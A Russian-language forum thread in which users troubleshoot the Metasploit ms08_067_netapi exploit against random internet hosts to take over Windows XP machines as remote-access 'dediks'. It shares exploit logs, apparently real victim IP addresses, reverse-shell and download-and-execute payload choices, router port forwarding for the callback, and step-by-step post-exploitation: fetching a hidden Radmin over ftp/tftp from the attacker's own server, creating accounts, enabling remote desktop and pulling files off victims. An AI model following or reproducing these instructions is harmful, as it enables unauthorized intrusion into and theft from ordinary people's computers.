У меня не видит 445 порт. На каждом - пусто. Хм...

Незнаю у мну просканил нормально!

Незнаю у мну просканил нормально!
Так нужно б разобраться в чем дело. Как бы если там открыт порт 445 , то его должен видеть каждый , а не на выбор. Значит дело в портах на компе "сканера".

Уже тачек 30 проверил windows xp sp2 язык русский!
20:33:13 - Initialized the Metasploit Framework GUI.
20:33:58 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
20:33:59 - ms08_067_netapi Started reverse handler
20:34:01 - ms08_067_netapi Automatically detecting the target...
20:34:09 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Russian
20:34:09 - ms08_067_netapi Selected Target: Windows XP SP2 Russian (NX)
20:34:10 - ms08_067_netapi Triggering the vulnerability...

Вот это везде пишет и все некакого результата!
(
50 компов уже проверил все попрежнему неподключаетсо!
По моему это уже не актуально проше купить дедик за 5 баксов чем так сидеть и впустую тратить время!

Уже тачек 30 проверил windows xp sp2 язык русский!
20:33:13 - Initialized the Metasploit Framework GUI.
20:33:58 - ms08_067_netapi Launching exploit windows/smb/ms08_067_netapi...
20:33:59 - ms08_067_netapi Started reverse handler
20:34:01 - ms08_067_netapi Automatically detecting the target...
20:34:09 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Russian
20:34:09 - ms08_067_netapi Selected Target: Windows XP SP2 Russian (NX)
20:34:10 - ms08_067_netapi Triggering the vulnerability...

Вот это везде пишет и все некакого результата!
(
50 компов уже проверил все попрежнему неподключаетсо!
По моему это уже не актуально проше купить дедик за 5 баксов чем так сидеть и впустую тратить время!
Понимаешь , этот дед с открытым 445 видишь только ты по-мойму.
Я как только нашел 1 445 - сразу зашел.

Ну незнаю как это только я его один видеть могу я уже компов 80 насканил и безуспешно!

Ну незнаю как это только я его один видеть могу я уже компов 80 насканил и безуспешно!
мб фаер юзаеш?

dyExplode, у меня так же как и у него...
Ната нет, 4444 порт открыт, фаера нет.
Виснит там же.

Нет я все удалил и фаер и авп чтобы все проверить!

Вам некажетсо странным что в статье он описал 445 порт а насамом деле сканил 5110 и 4444 вопрос что ему мешало тогда написать статью на этих портах?

ребята, не ужели кому то жалко дать такой IP, который у вас получается шелл?
хочу у себя пробовать . тоже стоит на Triggering the vulnerability...
сделал переброс 4444, отключил у себя фаера. нефига.
вот те, кто пишет что все у них нормально - скиньте мне в личку я тоже посмотрю на самом деле все ОК, или просто вам понравился статья с скринами?!

ребята, не ужели кому то жалко дать такой IP, который у вас получается шелл?
хочу у себя пробовать . тоже стоит на Triggering the vulnerability...
сделал переброс 4444, отключил у себя фаера. нефига.
вот те, кто пишет что все у них нормально - скиньте мне в личку я тоже посмотрю на самом деле все ОК, или просто вам понравился статья с скринами?!


Я же тебе отправил в ПМ скрин на котором висит шелл , на этом же скрине ip , отписал в ПМ диапазон ипов .

ребята, не ужели кому то жалко дать такой IP, который у вас получается шелл?
хочу у себя пробовать . тоже стоит на Triggering the vulnerability...
сделал переброс 4444, отключил у себя фаера. нефига.
вот те, кто пишет что все у них нормально - скиньте мне в личку я тоже посмотрю на самом деле все ОК, или просто вам понравился статья с скринами?!
Давай лучш е ты в личку скинешь айпи на котором у тебя triggering и мы проверим? Если согласен - скидывай мне. Обьясню все .

nepster

хорошо. вот щас 2 есть, только что пробовал:
даже здесь вкладываю:
***.225.3.190:445
***.225.131.211:445
:445 - не забудь убрать.

Жду ответа.

P.S. скрыл по просьбе автара

Хех... не находит. Естественно если я щас коннект буду делать то будет писать что невозможно. Я без понятия чего так. Проверяли на 2 людях - один и тот же результат - у них тригер и видит.

201.225.3.190
У меня находит что 445 открыт...
Но, увы и ах :
01:50:47 - ms08_067_netapi Automatically detecting the target...
01:50:58 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:Spanish
01:50:58 - ms08_067_netapi Selected Target: Windows XP SP2 Spanish (NX)
01:51:00 - ms08_067_netapi Triggering the vulnerability...

И всё...

nepster

хорошо. вот щас 2 есть, только что пробовал:
даже здесь вкладываю:

:445 - не забудь убрать.

Жду ответа.

Алё ЛЮДИ , золотые вы мои , не чудите и не пишите тут ипы , лучше через ПМ .

nepster

ну тогда дай мне такого, чтоб получился шелл, я хочу посмотреть это вообше реально?
автор кинул мне скрин, но там ничего не понятно и не реально, т.к. с дедика коннектился через какой-то другой порт. мне надо со всего рабочего места проверить все в порядке мои настройки..

nepster

ну тогда дай мне такого, чтоб получился шелл, я хочу посмотреть это вообше реально?
автор кинул мне скрин, но там ничего не понятно и не реально, т.к. с дедика коннектился через какой-то другой порт. мне надо со всего рабочего места проверить все в порядке мои настройки..
А я думаешь нашел хоть один?
А нет , один нашел. В своей сети. И все. Дофига проверил от 0.0 до 255.255 несколько раз и ни одного.

просто нужно знать какие диапазоны сканить. Я за раз штук 10-15 уязвимых нахожу, а ведь всеголи нужно немного мозгами поработать.

nepster

мне надо со всего рабочего места проверить все в порядке мои настройки..

У меня такая же проблема была , есть и будет !!! со своего компа я вообще не могу приконектиться ни к одному шеллу , и когда сканирую со своего компа тоже ни одного открытого 445 порта не видет сканер во всём интернете !!!! во по этому и сижу в дедике , так что делай выводы ;)

да у меня со сканером все ОК. часто нахожу открытые 445 порты, много даже могу сказать, и всегда висит на том же месте.

dyExplode
твои слова ровно нулю без доказательства :)) вот из этих штук 10-15 один дай мне, чтоб убедится, что баг реальная, потом тебе ставлю репекты (+++) и напишу в форуме, что ты реальный тип ! а пока ничего не могу сказать.

да у меня со сканером все ОК. часто нахожу открытые 445 порты, много даже могу сказать, и всегда висит на том же месте.

dyExplode
твои слова ровно нулю без доказательства :)) вот из этих штук 10-15 один дай мне, чтоб убедится, что баг реальная, потом тебе ставлю репекты (+++) и напишу в форуме, что ты реальный тип ! а пока ничего не могу сказать.
:D :D :D :D

вот решил показать сканил на дедики и сканил на своём компе http://img90.imageshack.us/img90/356/96681050cs0.th.jpg (http://img90.imageshack.us/my.php?image=96681050cs0.jpg) это я пробовал сканить с помощью дсл, а если бы с помощью инета от городской сетки там бы вообще не чего не показало бы, вот так) так что делайте выводы!!!

Люди скиньте один ип в пм который с багой к которому уже можно подключиться просто для проверки(может у мну вкомпе проблемы!)
С меня +

да у меня со сканером все ОК. часто нахожу открытые 445 порты, много даже могу сказать, и всегда висит на том же месте.

dyExplode
твои слова ровно нулю без доказательства :)) вот из этих штук 10-15 один дай мне, чтоб убедится, что баг реальная, потом тебе ставлю репекты (+++) и напишу в форуме, что ты реальный тип ! а пока ничего не могу сказать.
хм. легче всего сказать дай Мне когда до этого другие трудились и искали а о том что баг реальный писал уже не один человек. да и ещё размер успеха прямо пропорционален прямоте рук.
http://xmages.net/out.php/i82567_1111.JPG
вот на скорую руку.

вот решил показать сканил на дедики и сканил на своём компе http://img90.imageshack.us/img90/356/96681050cs0.th.jpg (http://img90.imageshack.us/my.php?image=96681050cs0.jpg) это я пробовал сканить с помощью дсл, а если бы с помощью инета от городской сетки там бы вообще не чего не показало бы, вот так) так что делайте выводы!!!
Что значит "от инета городской сетки" ?

dyExplode
А почему у тебя порт на скриншоте другой?

dyExplode
А почему у тебя порт на скриншоте другой?
какой именно порт?

ну горотская сеть с ресурсами , и от неё инет, кароче через оптоволокно)) без выделеного айпи

какой именно порт?
1754

1754
пора всмотреть калыханку и баиньки ато так поздно наверно мозги нехотят работать! но всёже попробуй ими пораскинуть сплойт атакует по 445 порту а шел работает на 1754ом. что ещё непонятно?

Вот выпревели скрины лучшеб один айпи выложили и все бы посморели!
Что это фак и это актуально а не точно здесь нафлудили так бы давно все всё поняли!

где один валидный ip там и все поэтому Я думаю мало кто согласится вылаживать то что добыто хоть какимто но трудом

Вот выпревели скрины лучшеб один айпи выложили и все бы посморели!
Что это фак и это актуально а не точно здесь нафлудили так бы давно все всё поняли!


Никто тут айпи ни какие выкладывать не будет !!!!

Это я уже понял!

stopxaker в личку глянь!

Ура у меня получилося!Пацаны все это правда просто нужно искать ипы!

Предположим что FTP сервер у нас установлен и настроен , в cmd пишем

Код:

C:\>ftp ftp> o К 10.xx.xx.xx Связь с 10.xx.xx.xx . 220 Welcome to 10.xx.xx.xx FTP service. Пользователь (10.xx.xx.xx :(none)): anonymous 230 Login successful. ftp>

Вот это по подробнее можете обьяснить?
Где и что писать а то я неврублюся!

Предположим что FTP сервер у нас установлен и настроен , в cmd пишем

Код:

C:\>ftp ftp> o К 10.xx.xx.xx Связь с 10.xx.xx.xx . 220 Welcome to 10.xx.xx.xx FTP service. Пользователь (10.xx.xx.xx :(none)): anonymous 230 Login successful. ftp>

Вот это по подробнее можете обьяснить?
Где и что писать а то я неврублюся!
C:\>ftp -?
и
C:\>ftp
ftp>help
если не поможет то google.com

ну давай, diman19911, рассказывай в чем дело? все по ману? че там насчет порта?
у тебя НАТ ? кроме 4444 что еще надо переброс делать?

мля, запарился уже. в дипазоне 50 IP с открытом 445 портом, но шелла нигде нету !

Да не просто я искал сканил ипы и пробывал и зашло потом все по статье залил радмина ток это не дедик оказалсо а обыкновеный комп с юзверем!
Что сказать могу сканить ипв от 200.00.00.00
тама больше уязвимых тачек как я думаю!
Вот пример ип!
Токо чото когда сесию получаю захожу в командною строку то выкидует наверное фаер!
213.149.40.160
В обшем на тестите)))

Да не просто я искал сканил ипы и пробывал и зашло потом все по статье залил радмина ток это не дедик оказалсо а обыкновеный комп с юзверем!
Что сказать могу сканить ипв от 200.00.00.00
тама больше уязвимых тачек как я думаю!
Вот пример ип!
Токо чото когда сесию получаю захожу в командною строку то выкидует наверное фаер!
213.149.40.160
В обшем на тестите)))


зашло потом все по статье залил радмина ток это не дедик оказалсо а обыкновеный комп с юзверем!

Что есть в твоём понимании дедик ?

213.149.40.160

Просканил через свой дедик диапозон , ни одного открытого с 445 портом !

потом все по статье залил радмина ток это не дедик оказалсо а обыкновеный комп с юзверем!


оффтоп :

А вот я выцыпил необыкновенный комп с радминами :D

http://stopxaker-com.na.by/images/radmins.png

Да китайский!)))
Эт точно дедик!

diman19911

надо было мне в личку кинуть IP.

diman19911

надо было мне в личку кинуть IP.
Загрёб уже кто-то? :p

Хех...зачем же китайцев сканить?
США берите, там много всего ;)

хм никому не приходило в голову как выглядит клавиатура у китайцев))

http://www.mallex.info/images/picture33925.jpg

Меня больше другое волнует. Angry Ip Scanner версии 2.21 и версии 3.0 beta показывает немного разные результаты.

http://www.mallex.info/images/picture33925.jpg

Меня больше другое волнует. Angry Ip Scanner версии 2.21 и версии 3.0 beta показывает немного разные результаты.
Сильно разные?

Нет, не сильно. Но например, версия 2,21 показывает что:
у *.*.*.115 открыт 445
у *.*.*.139 открыт 445
у *.*.*.160 закрыт 445, но хост жив.

Версия 3,0 бета показывает что:
у *.*.*.115 открыт 445
у *.*.*.139 ЗАКРЫТ 445, но хост жив.
у *.*.*.160 ОТКРЫТ 445

Т.е. что-то тут не то...

бли н почему у меня вобще все 445 закрыты

У тебя все "кнопочки" рядом с IP-адресами красные или синие?

ну да, так и есть

Просто если все красные - ты сканируешь...мертвую или несуществующую сеть.
Если есть синие - это хорошо.
Ты, кстати, в настройках указал какой порт надо проверять на "открытость" ?

NiGHt-LEshiY
я сканировал по тому диапазоны который ты мне в личку скинул порты указал синих много но с открытым 445 нету тока с 3389(

Кстати, локальный адрес в настройках сплойта должен быть вида 192.168.1.* ?
foopi, надо сканировать только 445 порт.
Могу ещё диапазон подбросить, вот сейчас сканирую. Из 254 просканированный IP, порт 445 открыт у четырех.

NiGHt-LEshiY ну валяй скидывай.

Может для сканера надо открыть порт 445?

порт 445 открывать не надо, т.к. не твой 445-ый порт используется, а УДАЛЕННЫЙ.
Я бы подумал насчет открытия порта 4444, для сплойта..

тут ктото писал что шел вылетает в этом случае иногда помогает использование вместо generic/shell_reverse_tcp windows/shell_reverse_tcp. хотя что мешает попробовать другие пэйлоады напрмер которые качают файл на удалённый компьютер и запускают Его.

тут ктото писал что шел вылетает в этом случае иногда помогает использование вместо generic/shell_reverse_tcp windows/shell_reverse_tcp. хотя что мешает попробовать другие пэйлоады напрмер которые качают файл на удалённый компьютер и запускают Его.
например какие?

например какие?
Любые. Там каждая идет на порт 445 . Начинка я имею ввиду.

че-то никак немогу понять как можно открыть у себя 4444 ?

че-то никак немогу понять как можно открыть у себя 4444 ?
1. зачем?
2.в брейдмаузере или в своем фаерволе

no_name
вот и я говорю зачем ? (про фаеры все понятно) просто я знаю, что система порты открывает по необходимости.

например какие?
ну например что нибудь из категории download_exec
также както руки недоходят попробовать windows/adduser если вдруг у кого получится отпишите по сути должно без лишнего гемора создавать учётку.

ну например что нибудь из категории download_exec
также както руки недоходят попробовать windows/adduser если вдруг у кого получится отпишите по сути должно без лишнего гемора создавать учётку.
Хех... найду порт - попробую...

Всем привет. У меня назрел вопрос про Metasploit пытаюсь заюзать так как тут описанно уже более 100 машин перелопатил и нифига...
а вопрос такой в LHOST нужно писать локальный адрес вот только какой?
у меня ADSL модем стоит роутером т.е. DHCP и соответственно локалный адрес мой 192.168.1.2 или же нужно писать внешний адрес? типа 82.68.125.32 - это пример

Пересканил кучу... Нашёл несколько. Сессия создаётся с ними совершенно с другого ИП (каждый раз разный) и автоматом рвётся через 20 секунд. втф? -.-

Ну хоть сессии начали создаваться...

ya_mag

да нет друг, ничего ненадо там писать. там уже прописан 4444 порт.
до сих пор и мне не ясно, что точно надо ремапинг настроить ? т.е. настроил, но 0 результатов. у кого работает и без репаминга. кто-то утверждает, что надо делать ремапинг. хрен его знает.

Всем привет. У меня назрел вопрос про Metasploit пытаюсь заюзать так как тут описанно уже более 100 машин перелопатил и нифига...
а вопрос такой в LHOST нужно писать локальный адрес вот только какой?
у меня ADSL модем стоит роутером т.е. DHCP и соответственно локалный адрес мой 192.168.1.2 или же нужно писать внешний адрес? типа 82.68.125.32 - это пример
Внешний пиши

Внешний пиши
это с каких пор и кто сказал?
зачем в MSF писать свой внешний адрес ?

это с каких пор и кто сказал?
зачем в MSF писать свой внешний адрес ?
а что внутренний? не тупи!

dyExplode
бля, в локальном сети (все, кто находится за роутером) - у них ОДИН IP !!! из класса в основном С. Т.е. НЕ интернетский ! и нахрена тебе в MSF написать IP адрес внешнего интерфейса роутера? ибо NAT отменяли?!
мвключи, и думай что пишешь !

dyExplode
бля, в локальном сети (все, кто находится за роутером) - у них ОДИН IP !!! из класса в основном С. Т.е. НЕ интернетский ! и нахрена тебе в MSF написать IP адрес внешнего интерфейса роутера? ибо NAT отменяли?!
мвключи, и думай что пишешь !
Об этом по 500 раз писали в стать про метсплойт вот почитай http://forum.antichat.ru/threadnav21599-2-10.html , всегда пишется внешний ай-пи, сам подумай

так, вы про какого IP говорите ? я про это говорю:

http://i008.radikal.ru/0901/c9/decd111adb43.jpg

а в роутере можно делать ремапинг на этот IP порт 4444, если конечно надо делать переброс порта.

так, вы про какого IP говорите ? я про это говорю:

http://i008.radikal.ru/0901/c9/decd111adb43.jpg

а в роутере можно делать ремапинг на этот IP порт 4444, если конечно надо делать переброс порта.
Да этот самый, там пишешь свой ВНЕШНИЙ АЙ-ПИ. На роутере настраиваешь НАТ, создаешь правило для фаера.

не верится, что за NAT_ом "живет" реальный IP адрес...
но проверю, если получится коннект - от меня респекты.

не верится, что за NAT_ом "живет" реальный IP адрес...
но проверю, если получится коннект - от меня респекты.
Если ты через роутер , то на роутере "192.168.0.1" , открываешь порт 4444 для своего компа "192.168.0.130" (пример) . У себя на компе либо вырубаешь фаер , либо пропускаешь порт 4444.

Если ты через роутер - обязом. открой 4444.

длого искал в роуторе ремапинг.... так и не нашол :( нашол такую фигню.... я в англиском плохо соображаю... и переводчики сильно не помагли

NAT -- Port Triggering Setup

Some applications require that specific ports in the Router's firewall be opened for access by the remote parties. Port Trigger dynamically opens up the 'Open Ports' in the firewall when an application on the LAN initiates a TCP/UDP connection to a remote party using the 'Triggering Ports'. The Router allows the remote party from the WAN side to establish new connections back to the application on the LAN side using the 'Open Ports'. A maximum of 32 entries can be configured.

настроил так

Application Trigger Open Remove
Name Protocol Port Range Protocol Port Range
____________Start End Start End
fignya TCP 4444 4444 TCP 4444 4444

надеюсь правильно?

и кстати уже дофига разных сетей просканил находил кучу компов с открытым 445 портом и чаше всего вылетало вот это
23:33:46 - ms08_067_netapi Started reverse handler
23:33:48 - ms08_067_netapi Automatically detecting the target...
23:34:02 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:English
23:34:02 - ms08_067_netapi Selected Target: Windows XP SP2 English (NX)
23:34:05 - ms08_067_netapi Triggering the vulnerability...

длого искал в роуторе ремапинг.... так и не нашол :( нашол такую фигню.... я в англиском плохо соображаю... и переводчики сильно не помагли

настроил так

надеюсь правильно?

и кстати уже дофига разных сетей просканил находил кучу компов с открытым 445 портом и чаше всего вылетало вот это
23:33:46 - ms08_067_netapi Started reverse handler
23:33:48 - ms08_067_netapi Automatically detecting the target...
23:34:02 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:English
23:34:02 - ms08_067_netapi Selected Target: Windows XP SP2 English (NX)
23:34:05 - ms08_067_netapi Triggering the vulnerability...
Какой роутер?

nepster
?? че то вообше не в тему.
мы здесь про внешнего IP говорим, а не про фаер.

ya_mag
Это вроде настройки firewall. у меня например находится под VIRTUAL SERVER.

nepster
?? че то вообше не в тему.
мы здесь про внешнего IP говорим, а не про фаер.

ya_mag
Это вроде настройки firewall. у меня например находится под VIRTUAL SERVER.


"длого искал в роуторе ремапинг.... так и не нашол нашол такую фигню.... я в англиском плохо соображаю... и переводчики сильно не помагли" - про что речь шла? Про роутер. Я помогаю человеку роутер настроить. Про то как открыть порт на роутере.

да я пытаюсь настроить роутер...
ASUS AM 604
вот настроил так

NAT -- Virtual Servers Setup

Virtual Server allows you to direct incoming traffic from the WAN side (identified by protocol and external port) to the internal server with a private IP address on the LAN side. The internal port is required only if the external port needs to be converted to a different port number used by the server on the LAN side. A maximum of 32 entries can be configured.


Server Name External Port Start External Port End Protocol Internal Port Start Internal Port End Server IP Address Remove
proba 4444 4444 TCP 4444 4444 192.168.1.2

ya_mag

если адрес товего компа 192.168.1.2, то верно !
23:33:46 - ms08_067_netapi Started reverse handler
23:33:48 - ms08_067_netapi Automatically detecting the target...
23:34:02 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:English
23:34:02 - ms08_067_netapi Selected Target: Windows XP SP2 English (NX)
23:34:05 - ms08_067_netapi Triggering the vulnerability...
а это загадочная проблема. найдешь решение - мне тоже скажешь ))))

да я пытаюсь настроить роутер...
ASUS AM 604
вот настроил так

http://www.portforward.com/english/routers/port_forwarding/routerindex.htm вот сайт про порт форвардинг со всеми роутерами.

Ояебу,у меня Оутпост как новогодняя ёлка светится от сканирования портов

такой вопрос:
а можно ли автоматизировать процесс проверки уязвимых машин? т.е. например создать какойнибуть батник...
генератор для батника я бы смог написать.... вот только мне бы образец команд.

Сканировать - это еще херня, у меня вот что вылез:
http://s52.radikal.ru/i136/0901/4e/73215f46d17a.jpg
и потом еще куча подобных ошибок. кто-то написал, что у жертвы вылетает обишка :)))) ну вот, у меня вытелала :D
Сканировал свой комп наличие 445 порта - и как не странно открыть ! )))) бля, как можно пропустить такого.....
теперь меня хэкали, чтоли? или еще не факт?
стоит NOD32 smart security с интерактивном файрволом. ворде не был запрос на подключение из внешнего мира.

Так...Я не очень подкован в этой теме, так что засорять тему своими вопросами не хочу. Напишите в ПМ, кто знает что такое роутер, кто знает какого живется без внешнего IP и кто сможет объяснить мне все по порядку. Спасибо.
:D

хы... Включён Оутпост - не вижу не одного 445. Выключен - на каждом 3ем компе...
Но всё равно дальше Triggering the vulnerability... не идёт))

извеняюсь за тупость , как кинуть radmin жертве на комп одним файлом ? :D киньте ктото пожалуйсто ссылку на готовый радмин ( допустим лог,пас 123456)

извеняюсь за тупость , как кинуть radmin жертве на комп одним файлом ? :D киньте ктото пожалуйсто ссылку на готовый радмин ( допустим лог,пас 123456)
поищи на форуме... скрытый радмин..

а на счет статьи, у меня такая же трабла что и у мнегих

23:33:46 - ms08_067_netapi Started reverse handler 23:33:48 - ms08_067_netapi Automatically detecting the target... 23:34:02 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:English 23:34:02 - ms08_067_netapi Selected Target: Windows XP SP2 English (NX) 23:34:05 - ms08_067_netapi Triggering the vulnerability...

модем настраивал и роутером и бриджем... не че не помогает...
автор статьи обьясни ситуацию...

Это применение уязвимости. Т.е. сплойт что-то делает. Возможно на том компе фаервол, или что-то подобное.

поищи на форуме... скрытый радмин..

а на счет статьи, у меня такая же трабла что и у мнегих

23:33:46 - ms08_067_netapi Started reverse handler 23:33:48 - ms08_067_netapi Automatically detecting the target... 23:34:02 - ms08_067_netapi Fingerprint: Windows XP Service Pack 2 - lang:English 23:34:02 - ms08_067_netapi Selected Target: Windows XP SP2 English (NX) 23:34:05 - ms08_067_netapi Triggering the vulnerability...

модем настраивал и роутером и бриджем... не че не помогает...
автор статьи обьясни ситуацию...
просто нужно искать другой ip адрес у меня такое часто бывает , ищи другой ип не зациклюйся на одном . из 10 ip с открытым портом у меня 3-4 cmd , токо проблема немогу найти где взять RADMIN

извеняюсь за тупость , как кинуть radmin жертве на комп одним файлом ? :D киньте ктото пожалуйсто ссылку на готовый радмин ( допустим лог,пас 123456)
Зачем ставить радмин? Как только получишь смд , делай учетку и заходи так. Радмин быстрее запалят чем учетку.

Насчет Trigerring . Devil какой роутер и есть ли реал IP?

Зачем ставить радмин? Как только получишь смд , делай учетку и заходи так. Радмин быстрее запалят чем учетку.

Насчет Trigerring . Devil какой роутер и есть ли реал IP?
а смысл делать учетку если почти на всех компах запрещено подключение к удаленному раб. столу ? вот для етого и нужен радмин для того чтобы он открыл нам порт к конекту через RADMINviever

Зачем ставить радмин? Как только получишь смд , делай учетку и заходи так. Радмин быстрее запалят чем учетку.

Насчет Trigerring . Devil какой роутер и есть ли реал IP?
как понять какой роутер?)) обычный))...

*DeViL*, фирмО

а смысл делать учетку если почти на всех компах запрещено подключение к удаленному раб. столу ? вот для етого и нужен радмин для того чтобы он открыл нам порт к конекту через RADMINviever
Мде....
Чтобы открыть порт - качаешь файл terminal.exe и делаешь из дедика - службу сервисов и можешь делать коннект через удаленный рабочий стол , а там делай все что захочешь.

Мде....
Чтобы открыть порт - качаешь файл terminal.exe и делаешь из дедика - службу сервисов и можешь делать коннект через удаленный рабочий стол , а там делай все что захочешь.
тоесть как я понял можно и без радмина точно также залить terminal , создать учетку и го в удален стол ?:)

Да. Но все таки у радмина есть ряд преимуществ...

Да. Но все таки у радмина есть ряд преимуществ...
Ты будешь через радмин управлять дедиком? Запускать , компилировать эксплойты допустим , запускать сканеры и бруты?

Да. Но все таки у радмина есть ряд преимуществ...
преимущества то есть , но где взять радмина одним файлом ?:) через него можно быстро перекинуть файлы , ну а потом уже удаленн стол

нах одним файлом? ну сделай sfx архив, через шелл распакуешь...

SEWERN

друг, кинь мне один IP, на который у тебя открывает cmd ? хочу проверить свои настройки.. а то пробовал больше 100 -ничего не получается ..
все висит на Triggering the vulnerability...

У меня так же. Ты ведь за роутером сидишь, да?
Я знакомого научил игрушкой этой пользоваться, так он раза с десятого cmd получил=)

как можно перезагрузить комп через cmd ?:) ведь для запуска teminal нужна перезагрузка((

_ttp://www.dynawell.com/reskit/microsoft/win2000/shutdown.zip ссылка на файл. Это для Win2000

Так же стандартными программами можно в ХР
cmd > shutdown /? - полная справка.
-s - вырубить комп
-t - время "выруба"
-r - перезагрузить
Это основные значения

*DeViL*, фирмО
ZyXEL

у меня тут небольшой вопросик, а какими командами можно за пустить фтп сервак)?? я щас нахожусь
C:\>ftp
ftp

ZyXEL

у меня тут небольшой вопросик, а какими командами можно за пустить фтп сервак)?? я щас нахожусь
C:\>ftp
ftp
Запусти у себя фтп сервер прогой любой. Потом заходишь в смд к дедику и пишешь:
C:\> ftp
ftp o xxx.xxx.xxx.xxx - ip adress фтп

вопщем, иногда шелл получает, как только нажимаешь интеракт, сразу вырубается
и еще по поводу terminal.exe:
запускаю его, учетка создается, при заходе авторизацию проходит, выходит Да/Нет, что типа если "Windows/-Windows" (толи юзер такой, толи машина) уже зашел и его выкинет, нажимаю Да, выходит алерт, что невозможно выкинуть и опять Да/Нет тот

как можно перезагрузить комп через cmd ?:) ведь для запуска teminal нужна перезагрузка((

cmd

shutdown -r


Параметры
-l
Осуществляет выход текущего пользователя из системы (также используется по умолчанию). -m имя_компьютера имеет приоритет.
-s
Выключает локальный компьютер.
-r
Выполняет перезагрузку после выключения.
-a
Прерывает выключение. Игнорируются все параметры, кроме -l и имя_компьютера. Параметр -a можно использовать только в течение интервала таймаута.
-f

А вообще всё ответы есть уже в ваших компьютерах

Ценр Справки и Поддержики

ZyXEL

у меня тут небольшой вопросик, а какими командами можно за пустить фтп сервак)?? я щас нахожусь
C:\>ftp
ftp
я юзаю по этому способу tftp -i tvoi-ip-adress get fail.exe , так проще ftp не просит акк и пасс , _https://forum.antichat.ru/threadnav99665-10-10-%E4%E5%E4%E8%EA.html 96 пост

cmd

shutdown -r




А вообще всё ответы есть уже в ваших компьютерах

Ценр Справки и Поддержики
Уже ответили по поводу перезагрузки.
Ты лучше ответь на вопросы по тригеру

теперь чтоб всё Всем было понятно:
сборку teminal качаем тут http://lebed.ucoz.ru/soft/terminal.zip
radmin одним файлом качаем тут http://depositfiles.com/files/1763484 gпарль на архив qiq.ru(инструкция прилагается) установка скрыта от глаз пользователя.
теперь с ftp в качестве сервера на своём компе использую serv-U настроенный на анононимный вход.
затем получив шел Мы увидим чтото наподобие
C:\windows\system32
затем набираем
C:\windows\system32>ftp -A xxx.xxx.xxx.xxx
где xxx.xxx.xxx.xxx ip Вашего компьютера или какого либо другого где стоит ftp сервер на котором лежит Наш радмин
после чего Мы увидимftp>
далее
ftp>get hack.exe
где hack.exe и будет Наш радмин естественно имя можно использовать любое.
после того как файл скачается(например в serv-U видно когда идёт процесс скачки) закрываем соединение и выходим из клиента ftp
close
quit
также некоторых может пугать что в шеле часто не отображается приглашение клиентаftp> но всё работает и бояться не нужно.
после того как файл залит и Мы вышли из ftp клиента командой dir проверяем есть ли в папке наш файл если есть запускаем Его C:\windows\system32\hack.exe после чего желательно проверить есть ли Он в процессах командой tasklist если есть то всё нормально можно запускать вьювера и конектицца к компу. также не следует бояться что первые несколько минут иногда нельзя подключиться но это проходит. надеюсь понятно обьяснил

бля, вот радмин никак не появляется в списке tasklist (нету r-server.exe).
заливаю в диск С жертвы,тотом пишу:
radmin.exe (так называется файл).
вроде запускается, но нигде нету, да и вювер не видет.

и еще, на дедике есть папка например 111. как его скачать к себе?
делаю tftp put _свой_IP_tftp_сервера 111 , но это для одиночного файла.
никто незнает как написать для папки целиком?

и еще, на дедике есть папка например 111. как его скачать к себе?
делаю tftp put _свой_IP_tftp_сервера 111 , но это для одиночного файла.
никто незнает как написать для папки целиком?
никак, фтп пофайлово только отдает

статья рул) мучался 3 дня и наконецто первая жертва)

статья рул) мучался 3 дня и наконецто первая жертва)

с шеллом тебя :) поверти у меня тоже всё сначало было не всё гладко , по этому и выложил статью когда во всём разобрался и всё начало работать

О, молодец! Надеюсь дедик останется и ты сделаешь что-нибудь умное с ним=)

правильно! сначала нужно совсем разобраться как и что работает и по какому принципу а потом уже приступать к действию в противном же случае можно легко быть замеченым админом.

как решить проблему при конекте к удаленному столу "интерактивный вход в систему на данном компьютере запрещен локальной политикой" или нужна перезагрузка компа после добавления юзера в смд ?

stopxaker

чувак, получился ! все таки проблема у меня была. щас уже нормально получаю шеллы !
респект тебе !

как решить проблему при конекте к удаленному столу "интерактивный вход в систему на данном компьютере запрещен локальной политикой" или нужна перезагрузка компа после добавления юзера в смд ?
Тебе нужно зайти в панель управления и оттуда разрешить интерактивное ...